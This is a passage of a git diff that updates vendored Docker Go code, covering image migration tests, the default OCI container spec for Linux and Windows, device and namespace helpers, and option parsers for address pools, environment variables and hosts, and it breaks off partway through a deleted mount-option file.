-480,7 +477,7 @@ func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metad checksum, err := ioutil.ReadFile(filepath.Join(root, graphDirName, id, "checksum")) if err == nil { // best effort - dgst, err := digest.ParseDigest(string(checksum)) + dgst, err := digest.Parse(string(checksum)) if err == nil { V2MetadataService := metadata.NewV2MetadataService(ms) V2MetadataService.Add(layer.DiffID(), metadata.V2Metadata{Digest: dgst}) diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go index be82fdc75e..09cdac82da 100644 --- a/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go +++ b/vendor/github.com/docker/docker/migrate/v1/migratev1_test.go @@ -1,4 +1,4 @@ -package v1 +package v1 // import "github.com/docker/docker/migrate/v1" import ( "crypto/rand" @@ -13,11 +13,11 @@ import ( "runtime" "testing" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/image" "github.com/docker/docker/layer" - "github.com/docker/docker/reference" + "github.com/opencontainers/go-digest" ) func TestMigrateRefs(t *testing.T) { @@ -40,9 +40,9 @@ func TestMigrateRefs(t *testing.T) { } expected := map[string]string{ - "busybox:latest": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", - "busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", - "registry:2": "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae", + "docker.io/library/busybox:latest": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", + "docker.io/library/busybox@sha256:16a2a52884c2a9481ed267c2d46483eac7693b813a63132368ab098a71303f8a": "sha256:fcde2b2edba56bf408601fb721fe9b5c338d10ee429ea04fae5511b68fbf8fb9", + "docker.io/library/registry:2": "sha256:2c26b46b68ffc68ff99b453c1d30413413422d706483bfa0f98a5e886266e7ae", } if !reflect.DeepEqual(expected, ta.refs) { @@ -87,14 +87,15 @@ func TestMigrateContainers(t *testing.T) { t.Fatal(err) } - ls := &mockMounter{} - ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb")) if err != nil { t.Fatal(err) } - is, err := image.NewImageStore(ifs, ls) + ls := &mockMounter{} + mmMap := make(map[string]image.LayerGetReleaser) + mmMap[runtime.GOOS] = ls + is, err := image.NewImageStore(ifs, mmMap) if err != nil { t.Fatal(err) } @@ -165,14 +166,15 @@ func TestMigrateImages(t *testing.T) { t.Fatal(err) } - ls := &mockRegistrar{} - ifs, err := image.NewFSStoreBackend(filepath.Join(tmpdir, "imagedb")) if err != nil { t.Fatal(err) } - is, err := image.NewImageStore(ifs, ls) + ls := &mockRegistrar{} + mrMap := make(map[string]image.LayerGetReleaser) + mrMap[runtime.GOOS] = ls + is, err := image.NewImageStore(ifs, mrMap) if err != nil { t.Fatal(err) } @@ -323,10 +325,7 @@ func addContainer(dest, jsonConfig string) error { if err := os.MkdirAll(contDir, 0700); err != nil { return err } - if err := ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600); err != nil { - return err - } - return nil + return ioutil.WriteFile(filepath.Join(contDir, "config.json"), []byte(jsonConfig), 0600) } type mockTagAdder struct { diff --git a/vendor/github.com/docker/docker/oci/defaults_linux.go b/vendor/github.com/docker/docker/oci/defaults.go similarity index 58% rename from vendor/github.com/docker/docker/oci/defaults_linux.go rename to vendor/github.com/docker/docker/oci/defaults.go index 8b3ce7281b..4145412dd4 100644 --- a/vendor/github.com/docker/docker/oci/defaults_linux.go +++ b/vendor/github.com/docker/docker/oci/defaults.go @@ -1,4 +1,4 @@ -package oci +package oci // import "github.com/docker/docker/oci" import ( "os" @@ -7,19 +7,65 @@ import ( "github.com/opencontainers/runtime-spec/specs-go" ) -func sPtr(s string) *string { return &s } func iPtr(i int64) *int64 { return &i } func u32Ptr(i int64) *uint32 { u := uint32(i); return &u } func fmPtr(i int64) *os.FileMode { fm := os.FileMode(i); return &fm } -// DefaultSpec returns default oci spec used by docker. +func defaultCapabilities() []string { + return []string{ + "CAP_CHOWN", + "CAP_DAC_OVERRIDE", + "CAP_FSETID", + "CAP_FOWNER", + "CAP_MKNOD", + "CAP_NET_RAW", + "CAP_SETGID", + "CAP_SETUID", + "CAP_SETFCAP", + "CAP_SETPCAP", + "CAP_NET_BIND_SERVICE", + "CAP_SYS_CHROOT", + "CAP_KILL", + "CAP_AUDIT_WRITE", + } +} + +// DefaultSpec returns the default spec used by docker for the current Platform func DefaultSpec() specs.Spec { + return DefaultOSSpec(runtime.GOOS) +} + +// DefaultOSSpec returns the spec for a given OS +func DefaultOSSpec(osName string) specs.Spec { + if osName == "windows" { + return DefaultWindowsSpec() + } + return DefaultLinuxSpec() +} + +// DefaultWindowsSpec create a default spec for running Windows containers +func DefaultWindowsSpec() specs.Spec { + return specs.Spec{ + Version: specs.Version, + Windows: &specs.Windows{}, + Process: &specs.Process{}, + Root: &specs.Root{}, + } +} + +// DefaultLinuxSpec create a default spec for running Linux containers +func DefaultLinuxSpec() specs.Spec { s := specs.Spec{ Version: specs.Version, - Platform: specs.Platform{ - OS: runtime.GOOS, - Arch: runtime.GOARCH, + Process: &specs.Process{ + Capabilities: &specs.LinuxCapabilities{ + Bounding: defaultCapabilities(), + Permitted: defaultCapabilities(), + Inheritable: defaultCapabilities(), + Effective: defaultCapabilities(), + }, }, + Root: &specs.Root{}, } s.Mounts = []specs.Mount{ { @@ -32,7 +78,7 @@ func DefaultSpec() specs.Spec { Destination: "/dev", Type: "tmpfs", Source: "tmpfs", - Options: []string{"nosuid", "strictatime", "mode=755"}, + Options: []string{"nosuid", "strictatime", "mode=755", "size=65536k"}, }, { Destination: "/dev/pts", @@ -58,31 +104,23 @@ func DefaultSpec() specs.Spec { Source: "mqueue", Options: []string{"nosuid", "noexec", "nodev"}, }, - } - s.Process.Capabilities = []string{ - "CAP_CHOWN", - "CAP_DAC_OVERRIDE", - "CAP_FSETID", - "CAP_FOWNER", - "CAP_MKNOD", - "CAP_NET_RAW", - "CAP_SETGID", - "CAP_SETUID", - "CAP_SETFCAP", - "CAP_SETPCAP", - "CAP_NET_BIND_SERVICE", - "CAP_SYS_CHROOT", - "CAP_KILL", - "CAP_AUDIT_WRITE", + { + Destination: "/dev/shm", + Type: "tmpfs", + Source: "shm", + Options: []string{"nosuid", "noexec", "nodev", "mode=1777"}, + }, } s.Linux = &specs.Linux{ MaskedPaths: []string{ "/proc/kcore", + "/proc/keys", "/proc/latency_stats", "/proc/timer_list", "/proc/timer_stats", "/proc/sched_debug", + "/proc/scsi", "/sys/firmware", }, ReadonlyPaths: []string{ @@ -93,7 +131,7 @@ func DefaultSpec() specs.Spec { "/proc/sys", "/proc/sysrq-trigger", }, - Namespaces: []specs.Namespace{ + Namespaces: []specs.LinuxNamespace{ {Type: "mount"}, {Type: "network"}, {Type: "uts"}, @@ -102,67 +140,72 @@ func DefaultSpec() specs.Spec { }, // Devices implicitly contains the following devices: // null, zero, full, random, urandom, tty, console, and ptmx. - // ptmx is a bind-mount or symlink of the container's ptmx. + // ptmx is a bind mount or symlink of the container's ptmx. // See also: https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#default-devices - Devices: []specs.Device{}, - Resources: &specs.Resources{ - Devices: []specs.DeviceCgroup{ + Devices: []specs.LinuxDevice{}, + Resources: &specs.LinuxResources{ + Devices: []specs.LinuxDeviceCgroup{ { Allow: false, - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(1), Minor: iPtr(5), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(1), Minor: iPtr(3), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(1), Minor: iPtr(9), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(1), Minor: iPtr(8), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(5), Minor: iPtr(0), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: true, - Type: sPtr("c"), + Type: "c", Major: iPtr(5), Minor: iPtr(1), - Access: sPtr("rwm"), + Access: "rwm", }, { Allow: false, - Type: sPtr("c"), + Type: "c", Major: iPtr(10), Minor: iPtr(229), - Access: sPtr("rwm"), + Access: "rwm", }, }, }, } + // For LCOW support, populate a blank Windows spec + if runtime.GOOS == "windows" { + s.Windows = &specs.Windows{} + } + return s } diff --git a/vendor/github.com/docker/docker/oci/defaults_solaris.go b/vendor/github.com/docker/docker/oci/defaults_solaris.go deleted file mode 100644 index 85c8b68e16..0000000000 --- a/vendor/github.com/docker/docker/oci/defaults_solaris.go +++ /dev/null @@ -1,20 +0,0 @@ -package oci - -import ( - "runtime" - - "github.com/opencontainers/runtime-spec/specs-go" -) - -// DefaultSpec returns default oci spec used by docker. -func DefaultSpec() specs.Spec { - s := specs.Spec{ - Version: "0.6.0", - Platform: specs.Platform{ - OS: "SunOS", - Arch: runtime.GOARCH, - }, - } - s.Solaris = &specs.Solaris{} - return s -} diff --git a/vendor/github.com/docker/docker/oci/defaults_windows.go b/vendor/github.com/docker/docker/oci/defaults_windows.go deleted file mode 100644 index ab51904ec4..0000000000 --- a/vendor/github.com/docker/docker/oci/defaults_windows.go +++ /dev/null @@ -1,19 +0,0 @@ -package oci - -import ( - "runtime" - - "github.com/opencontainers/runtime-spec/specs-go" -) - -// DefaultSpec returns default spec used by docker. -func DefaultSpec() specs.Spec { - return specs.Spec{ - Version: specs.Version, - Platform: specs.Platform{ - OS: runtime.GOOS, - Arch: runtime.GOARCH, - }, - Windows: &specs.Windows{}, - } -} diff --git a/vendor/github.com/docker/docker/oci/devices_linux.go b/vendor/github.com/docker/docker/oci/devices_linux.go index 2840d2586a..46d4e1d32d 100644 --- a/vendor/github.com/docker/docker/oci/devices_linux.go +++ b/vendor/github.com/docker/docker/oci/devices_linux.go @@ -1,4 +1,4 @@ -package oci +package oci // import "github.com/docker/docker/oci" import ( "fmt" @@ -8,12 +8,12 @@ import ( "github.com/opencontainers/runc/libcontainer/configs" "github.com/opencontainers/runc/libcontainer/devices" - specs "github.com/opencontainers/runtime-spec/specs-go" + "github.com/opencontainers/runtime-spec/specs-go" ) -// Device transforms a libcontainer configs.Device to a specs.Device object. -func Device(d *configs.Device) specs.Device { - return specs.Device{ +// Device transforms a libcontainer configs.Device to a specs.LinuxDevice object. +func Device(d *configs.Device) specs.LinuxDevice { + return specs.LinuxDevice{ Type: string(d.Type), Path: d.Path, Major: d.Major, @@ -24,19 +24,19 @@ func Device(d *configs.Device) specs.Device { } } -func deviceCgroup(d *configs.Device) specs.DeviceCgroup { +func deviceCgroup(d *configs.Device) specs.LinuxDeviceCgroup { t := string(d.Type) - return specs.DeviceCgroup{ + return specs.LinuxDeviceCgroup{ Allow: true, - Type: &t, + Type: t, Major: &d.Major, Minor: &d.Minor, - Access: &d.Permissions, + Access: d.Permissions, } } // DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions. -func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) { +func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.LinuxDevice, devPermissions []specs.LinuxDeviceCgroup, err error) { resolvedPathOnHost := pathOnHost // check if it is a symbolic link diff --git a/vendor/github.com/docker/docker/oci/devices_unsupported.go b/vendor/github.com/docker/docker/oci/devices_unsupported.go index 6252cab536..af6dd3bda2 100644 --- a/vendor/github.com/docker/docker/oci/devices_unsupported.go +++ b/vendor/github.com/docker/docker/oci/devices_unsupported.go @@ -1,6 +1,6 @@ // +build !linux -package oci +package oci // import "github.com/docker/docker/oci" import ( "errors" @@ -11,10 +11,10 @@ import ( // Device transforms a libcontainer configs.Device to a specs.Device object. // Not implemented -func Device(d *configs.Device) specs.Device { return specs.Device{} } +func Device(d *configs.Device) specs.LinuxDevice { return specs.LinuxDevice{} } // DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions. // Not implemented -func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) { +func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.LinuxDevice, devPermissions []specs.LinuxDeviceCgroup, err error) { return nil, nil, errors.New("oci/devices: unsupported platform") } diff --git a/vendor/github.com/docker/docker/oci/namespaces.go b/vendor/github.com/docker/docker/oci/namespaces.go index 4902482498..5a2d8f2087 100644 --- a/vendor/github.com/docker/docker/oci/namespaces.go +++ b/vendor/github.com/docker/docker/oci/namespaces.go @@ -1,16 +1,13 @@ -package oci +package oci // import "github.com/docker/docker/oci" -import specs "github.com/opencontainers/runtime-spec/specs-go" +import "github.com/opencontainers/runtime-spec/specs-go" // RemoveNamespace removes the `nsType` namespace from OCI spec `s` -func RemoveNamespace(s *specs.Spec, nsType specs.NamespaceType) { - idx := -1 +func RemoveNamespace(s *specs.Spec, nsType specs.LinuxNamespaceType) { for i, n := range s.Linux.Namespaces { if n.Type == nsType { - idx = i + s.Linux.Namespaces = append(s.Linux.Namespaces[:i], s.Linux.Namespaces[i+1:]...) + return } } - if idx >= 0 { - s.Linux.Namespaces = append(s.Linux.Namespaces[:idx], s.Linux.Namespaces[idx+1:]...) - } } diff --git a/vendor/github.com/docker/docker/opts/address_pools.go b/vendor/github.com/docker/docker/opts/address_pools.go new file mode 100644 index 0000000000..9b27a62853 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/address_pools.go @@ -0,0 +1,84 @@ +package opts + +import ( + "encoding/csv" + "encoding/json" + "fmt" + "strconv" + "strings" + + types "github.com/docker/libnetwork/ipamutils" +) + +// PoolsOpt is a Value type for parsing the default address pools definitions +type PoolsOpt struct { + values []*types.NetworkToSplit +} + +// UnmarshalJSON fills values structure info from JSON input +func (p *PoolsOpt) UnmarshalJSON(raw []byte) error { + return json.Unmarshal(raw, &(p.values)) +} + +// Set predefined pools +func (p *PoolsOpt) Set(value string) error { + csvReader := csv.NewReader(strings.NewReader(value)) + fields, err := csvReader.Read() + if err != nil { + return err + } + + poolsDef := types.NetworkToSplit{} + + for _, field := range fields { + parts := strings.SplitN(field, "=", 2) + if len(parts) != 2 { + return fmt.Errorf("invalid field '%s' must be a key=value pair", field) + } + + key := strings.ToLower(parts[0]) + value := strings.ToLower(parts[1]) + + switch key { + case "base": + poolsDef.Base = value + case "size": + size, err := strconv.Atoi(value) + if err != nil { + return fmt.Errorf("invalid size value: %q (must be integer): %v", value, err) + } + poolsDef.Size = size + default: + return fmt.Errorf("unexpected key '%s' in '%s'", key, field) + } + } + + p.values = append(p.values, &poolsDef) + + return nil +} + +// Type returns the type of this option +func (p *PoolsOpt) Type() string { + return "pool-options" +} + +// String returns a string repr of this option +func (p *PoolsOpt) String() string { + var pools []string + for _, pool := range p.values { + repr := fmt.Sprintf("%s %d", pool.Base, pool.Size) + pools = append(pools, repr) + } + return strings.Join(pools, ", ") +} + +// Value returns the mounts +func (p *PoolsOpt) Value() []*types.NetworkToSplit { + return p.values +} + +// Name returns the flag name of this option +func (p *PoolsOpt) Name() string { + return "default-address-pools" +} diff --git a/vendor/github.com/docker/docker/opts/address_pools_test.go b/vendor/github.com/docker/docker/opts/address_pools_test.go new file mode 100644 index 0000000000..7f9c709968 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/address_pools_test.go @@ -0,0 +1,20 @@ +package opts // import "github.com/docker/docker/opts" + +import ( + "testing" +) + +func TestAddressPoolOpt(t *testing.T) { + poolopt := &PoolsOpt{} + var addresspool = "base=175.30.0.0/16,size=16" + var invalidAddresspoolString = "base=175.30.0.0/16,size=16, base=175.33.0.0/16,size=24" + + if err := poolopt.Set(addresspool); err != nil { + t.Fatal(err) + } + + if err := poolopt.Set(invalidAddresspoolString); err == nil { + t.Fatal(err) + } + +} diff --git a/vendor/github.com/docker/docker/opts/env.go b/vendor/github.com/docker/docker/opts/env.go new file mode 100644 index 0000000000..f6e5e9074d --- /dev/null +++ b/vendor/github.com/docker/docker/opts/env.go @@ -0,0 +1,48 @@ +package opts // import "github.com/docker/docker/opts" + +import ( + "fmt" + "os" + "runtime" + "strings" + + "github.com/pkg/errors" +) + +// ValidateEnv validates an environment variable and returns it. +// If no value is specified, it returns the current value using os.Getenv. +// +// As on ParseEnvFile and related to #16585, environment variable names +// are not validate what so ever, it's up to application inside docker +// to validate them or not. +// +// The only validation here is to check if name is empty, per #25099 +func ValidateEnv(val string) (string, error) { + arr := strings.Split(val, "=") + if arr[0] == "" { + return "", errors.Errorf("invalid environment variable: %s", val) + } + if len(arr) > 1 { + return val, nil + } + if !doesEnvExist(val) { + return val, nil + } + return fmt.Sprintf("%s=%s", val, os.Getenv(val)), nil +} + +func doesEnvExist(name string) bool { + for _, entry := range os.Environ() { + parts := strings.SplitN(entry, "=", 2) + if runtime.GOOS == "windows" { + // Environment variable are case-insensitive on Windows. PaTh, path and PATH are equivalent. + if strings.EqualFold(parts[0], name) { + return true + } + } + if parts[0] == name { + return true + } + } + return false +} diff --git a/vendor/github.com/docker/docker/opts/env_test.go b/vendor/github.com/docker/docker/opts/env_test.go new file mode 100644 index 0000000000..1ecf1e2b94 --- /dev/null +++ b/vendor/github.com/docker/docker/opts/env_test.go @@ -0,0 +1,124 @@ +package opts // import "github.com/docker/docker/opts" + +import ( + "fmt" + "os" + "runtime" + "testing" +) + +func TestValidateEnv(t *testing.T) { + testcase := []struct { + value string + expected string + err error + }{ + { + value: "a", + expected: "a", + }, + { + value: "something", + expected: "something", + }, + { + value: "_=a", + expected: "_=a", + }, + { + value: "env1=value1", + expected: "env1=value1", + }, + { + value: "_env1=value1", + expected: "_env1=value1", + }, + { + value: "env2=value2=value3", + expected: "env2=value2=value3", + }, + { + value: "env3=abc!qwe", + expected: "env3=abc!qwe", + }, + { + value: "env_4=value 4", + expected: "env_4=value 4", + }, + { + value: "PATH", + expected: fmt.Sprintf("PATH=%v", os.Getenv("PATH")), + }, + { + value: "=a", + err: fmt.Errorf(fmt.Sprintf("invalid environment variable: %s", "=a")), + }, + { + value: "PATH=something", + expected: "PATH=something", + }, + { + value: "asd!qwe", + expected: "asd!qwe", + }, + { + value: "1asd", + expected: "1asd", + }, + { + value: "123", + expected: "123", + }, + { + value: "some space", + expected: "some space", + }, + { + value: " some space before", + expected: " some space before", + }, + { + value: "some space after ", + expected: "some space after ", + }, + { + value: "=", + err: fmt.Errorf(fmt.Sprintf("invalid environment variable: %s", "=")), + }, + } + + // Environment variables are case in-sensitive on Windows + if runtime.GOOS == "windows" { + tmp := struct { + value string + expected string + err error + }{ + value: "PaTh", + expected: fmt.Sprintf("PaTh=%v", os.Getenv("PATH")), + } + testcase = append(testcase, tmp) + + } + + for _, r := range testcase { + actual, err := ValidateEnv(r.value) + + if err != nil { + if r.err == nil { + t.Fatalf("Expected err is nil, got err[%v]", err) + } + if err.Error() != r.err.Error() { + t.Fatalf("Expected err[%v], got err[%v]", r.err, err) + } + } + + if err == nil && r.err != nil { + t.Fatalf("Expected err[%v], but err is nil", r.err) + } + + if actual != r.expected { + t.Fatalf("Expected [%v], got [%v]", r.expected, actual) + } + } +} diff --git a/vendor/github.com/docker/docker/opts/hosts.go b/vendor/github.com/docker/docker/opts/hosts.go index 266df1e537..2adf4211d5 100644 --- a/vendor/github.com/docker/docker/opts/hosts.go +++ b/vendor/github.com/docker/docker/opts/hosts.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" @@ -9,7 +9,7 @@ import ( ) var ( - // DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. docker daemon -H tcp:// + // DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. dockerd -H tcp:// // These are the IANA registered port numbers for use with Docker // see http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=docker DefaultHTTPPort = 2375 // Default HTTP Port @@ -29,15 +29,15 @@ var ( // ValidateHost validates that the specified string is a valid host and returns it. func ValidateHost(val string) (string, error) { host := strings.TrimSpace(val) - // The empty string means default and is not handled by parseDockerDaemonHost + // The empty string means default and is not handled by parseDaemonHost if host != "" { - _, err := parseDockerDaemonHost(host) + _, err := parseDaemonHost(host) if err != nil { return val, err } } // Note: unlike most flag validators, we don't return the mutated value here - // we need to know what the user entered later (using ParseHost) to adjust for tls + // we need to know what the user entered later (using ParseHost) to adjust for TLS return val, nil } @@ -52,7 +52,7 @@ func ParseHost(defaultToTLS bool, val string) (string, error) { } } else { var err error - host, err = parseDockerDaemonHost(host) + host, err = parseDaemonHost(host) if err != nil { return val, err } @@ -60,9 +60,9 @@ func ParseHost(defaultToTLS bool, val string) (string, error) { return host, nil } -// parseDockerDaemonHost parses the specified address and returns an address that will be used as the host. +// parseDaemonHost parses the specified address and returns an address that will be used as the host. // Depending of the address specified, this may return one of the global Default* strings defined in hosts.go. -func parseDockerDaemonHost(addr string) (string, error) { +func parseDaemonHost(addr string) (string, error) { addrParts := strings.SplitN(addr, "://", 2) if len(addrParts) == 1 && addrParts[0] != "" { addrParts = []string{"tcp", addrParts[0]} @@ -149,3 +149,17 @@ func ParseTCPAddr(tryAddr string, defaultAddr string) (string, error) { return fmt.Sprintf("tcp://%s%s", net.JoinHostPort(host, port), u.Path), nil } + +// ValidateExtraHost validates that the specified string is a valid extrahost and returns it. +// ExtraHost is in the form of name:ip where the ip has to be a valid ip (IPv4 or IPv6). +func ValidateExtraHost(val string) (string, error) { + // allow for IPv6 addresses in extra hosts by only splitting on first ":" + arr := strings.SplitN(val, ":", 2) + if len(arr) != 2 || len(arr[0]) == 0 { + return "", fmt.Errorf("bad format for add-host: %q", val) + } + if _, err := ValidateIPAddress(arr[1]); err != nil { + return "", fmt.Errorf("invalid IP address in add-host: %q", arr[1]) + } + return val, nil +} diff --git a/vendor/github.com/docker/docker/opts/hosts_test.go b/vendor/github.com/docker/docker/opts/hosts_test.go index a5bec30d4c..cd8c3f91f2 100644 --- a/vendor/github.com/docker/docker/opts/hosts_test.go +++ b/vendor/github.com/docker/docker/opts/hosts_test.go @@ -1,7 +1,8 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" + "strings" "testing" ) @@ -82,12 +83,12 @@ func TestParseDockerDaemonHost(t *testing.T) { "localhost:5555/path": "tcp://localhost:5555/path", } for invalidAddr, expectedError := range invalids { - if addr, err := parseDockerDaemonHost(invalidAddr); err == nil || err.Error() != expectedError { + if addr, err := parseDaemonHost(invalidAddr); err == nil || err.Error() != expectedError { t.Errorf("tcp %v address expected error %q return, got %q and addr %v", invalidAddr, expectedError, err, addr) } } for validAddr, expectedAddr := range valids { - if addr, err := parseDockerDaemonHost(validAddr); err != nil || addr != expectedAddr { + if addr, err := parseDaemonHost(validAddr); err != nil || addr != expectedAddr { t.Errorf("%v -> expected %v, got (%v) addr (%v)", validAddr, expectedAddr, err, addr) } } @@ -146,3 +147,35 @@ func TestParseInvalidUnixAddrInvalid(t *testing.T) { t.Fatalf("Expected an %v, got %v", v, "unix:///var/run/docker.sock") } } + +func TestValidateExtraHosts(t *testing.T) { + valid := []string{ + `myhost:192.168.0.1`, + `thathost:10.0.2.1`, + `anipv6host:2003:ab34:e::1`, + `ipv6local:::1`, + } + + invalid := map[string]string{ + `myhost:192.notanipaddress.1`: `invalid IP`, + `thathost-nosemicolon10.0.0.1`: `bad format`, + `anipv6host:::::1`: `invalid IP`, + `ipv6local:::0::`: `invalid IP`, + } + + for _, extrahost := range valid { + if _, err := ValidateExtraHost(extrahost); err != nil { + t.Fatalf("ValidateExtraHost(`"+extrahost+"`) should succeed: error %v", err) + } + } + + for extraHost, expectedError := range invalid { + if _, err := ValidateExtraHost(extraHost); err == nil { + t.Fatalf("ValidateExtraHost(`%q`) should have failed validation", extraHost) + } else { + if !strings.Contains(err.Error(), expectedError) { + t.Fatalf("ValidateExtraHost(`%q`) error should contain %q", extraHost, expectedError) + } + } + } +} diff --git a/vendor/github.com/docker/docker/opts/hosts_unix.go b/vendor/github.com/docker/docker/opts/hosts_unix.go index 611407a9d9..9d5bb64565 100644 --- a/vendor/github.com/docker/docker/opts/hosts_unix.go +++ b/vendor/github.com/docker/docker/opts/hosts_unix.go @@ -1,6 +1,6 @@ // +build !windows -package opts +package opts // import "github.com/docker/docker/opts" import "fmt" diff --git a/vendor/github.com/docker/docker/opts/hosts_windows.go b/vendor/github.com/docker/docker/opts/hosts_windows.go index 7c239e00f1..906eba53ee 100644 --- a/vendor/github.com/docker/docker/opts/hosts_windows.go +++ b/vendor/github.com/docker/docker/opts/hosts_windows.go @@ -1,6 +1,4 @@ -// +build windows - -package opts +package opts // import "github.com/docker/docker/opts" // DefaultHost constant defines the default host string used by docker on Windows var DefaultHost = "npipe://" + DefaultNamedPipe diff --git a/vendor/github.com/docker/docker/opts/ip.go b/vendor/github.com/docker/docker/opts/ip.go index fb03b50111..cfbff3a9fd 100644 --- a/vendor/github.com/docker/docker/opts/ip.go +++ b/vendor/github.com/docker/docker/opts/ip.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "fmt" @@ -22,7 +22,7 @@ func NewIPOpt(ref *net.IP, defaultVal string) *IPOpt { } // Set sets an IPv4 or IPv6 address from a given string. If the given -// string is not parseable as an IP address it returns an error. +// string is not parsable as an IP address it returns an error. func (o *IPOpt) Set(val string) error { ip := net.ParseIP(val) if ip == nil { diff --git a/vendor/github.com/docker/docker/opts/ip_test.go b/vendor/github.com/docker/docker/opts/ip_test.go index 1027d84a05..966d7f21ec 100644 --- a/vendor/github.com/docker/docker/opts/ip_test.go +++ b/vendor/github.com/docker/docker/opts/ip_test.go @@ -1,4 +1,4 @@ -package opts +package opts // import "github.com/docker/docker/opts" import ( "net" diff --git a/vendor/github.com/docker/docker/opts/mount.go b/vendor/github.com/docker/docker/opts/mount.go deleted file mode 100644 index ce6383ddca..0000000000 --- a/vendor/github.com/docker/docker/opts/mount.go +++ /dev/null @@ -1,171 +0,0 @@ -package opts - -import ( - "encoding/csv" - "fmt" - "os" - "strconv" - "strings" - - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/go-units" -) - -// MountOpt is a Value type for parsing mounts -type MountOpt struct { - values []mounttypes.Mount -} - -// Set a new mount value -func (m *MountOpt) Set(value string) error { - csvReader := csv.NewReader(strings.NewReader(value)) - fields, err := csvReader.Read() - if err != nil { - return err - } - - mount := mounttypes.Mount{} - - volumeOptions := func() *mounttypes.VolumeOptions { - if mount.VolumeOptions == nil { - mount.VolumeOptions = &mounttypes.VolumeOptions{ - Labels: make(map[string]string), - } - } - if mount.VolumeOptions.DriverConfig == nil { - mount.VolumeOptions.DriverConfig = &mounttypes.Driver{} - } - return mount.VolumeOptions - } - - bindOptions := func() *mounttypes.BindOptions { - if mount.BindOptions == nil { - mount.BindOptions = new(mounttypes.BindOptions) - } - return mount.BindOptions - } - - tmpfsOptions := func() *mounttypes.TmpfsOptions { - if mount.TmpfsOptions == nil { - mount.TmpfsOptions = new(mounttypes.TmpfsOptions) - } - return mount.TmpfsOptions - } - - setValueOnMap := func(target map[string]string, value string) { - parts := strings.SplitN(value, "=", 2) - if len(parts) == 1 { - target[value] = "" - } else { - target[parts[0]] = parts[1] - } - } - - mount.Type = mounttypes.TypeVolume // default to volume mounts - // Set writable as the default - for _, field := range fields { - parts := strings.SplitN(field, "=", 2) - key := strings.ToLower(parts[0]) - - if len(parts) == 1 { - switch key { - case "readonly", "ro": - mount.ReadOnly = true - continue - case "volume-nocopy": - volumeOptions().NoCopy = true - continue - } - } - - if len(parts) != 2 { - return fmt.Errorf("invalid field '%s' must be a key=value pair", field) - } - - value := parts[1] - switch key { - case "type": - mount.Type = mounttypes.Type(strings.ToLower(value)) - case "source", "src": - mount.Source = value - case "target", "dst", "destination": - mount.Target = value - case "readonly", "ro": - mount.ReadOnly, err = strconv.ParseBool(value) - if err != nil { - return fmt.Errorf("invalid value for %s: %s", key, value) - } - case "bind-propagation": - bindOptions().Propagation = mounttypes.Propagation(strings.ToLower(value)) - case "volume-nocopy": - volumeOptions().NoCopy, err = strconv.ParseBool(value) - if err != nil { - return fmt.Errorf("invalid value for populate: %s", value) - } - case "volume-label": - setValueOnMap(volumeOptions().Labels, value) - case "volume-driver": - volumeOptions().DriverConfig.Name = value - case "volume-opt": - if volumeOptions().DriverConfig.Options == nil { - volumeOptions().DriverConfig.Options = make(map[string]string) - } - setValueOnMap(volumeOptions().DriverConfig.Options, value) - case "tmpfs-size": - sizeBytes, err := units.RAMInBytes(value) - if err != nil { - return fmt.Errorf("invalid value for %s: %s", key, value) - } - tmpfsOptions().SizeBytes = sizeBytes - case "tmpfs-mode": - ui64, err := strconv.ParseUint(value, 8, 32) - if err != nil { - return fmt.Errorf("invalid value for %s: %s", key, value) - } - tmpfsOptions().Mode = os.FileMode(ui64) - default: - return fmt.Errorf("unexpected key '%s' in '%s'", key, field) - } - } - - if mount.Type == "" { - return fmt.Errorf("type is required") - } - - if mount.Target == "" { - return fmt.Errorf("target is required") - } - - if mount.VolumeOptions != nil && mount.Type != mounttypes.TypeVolume { - return fmt.Errorf("cannot mix 'volume-*' options with mount type '%s'", mount.Type) - } - if mount.BindOptions != nil && mount.Type != 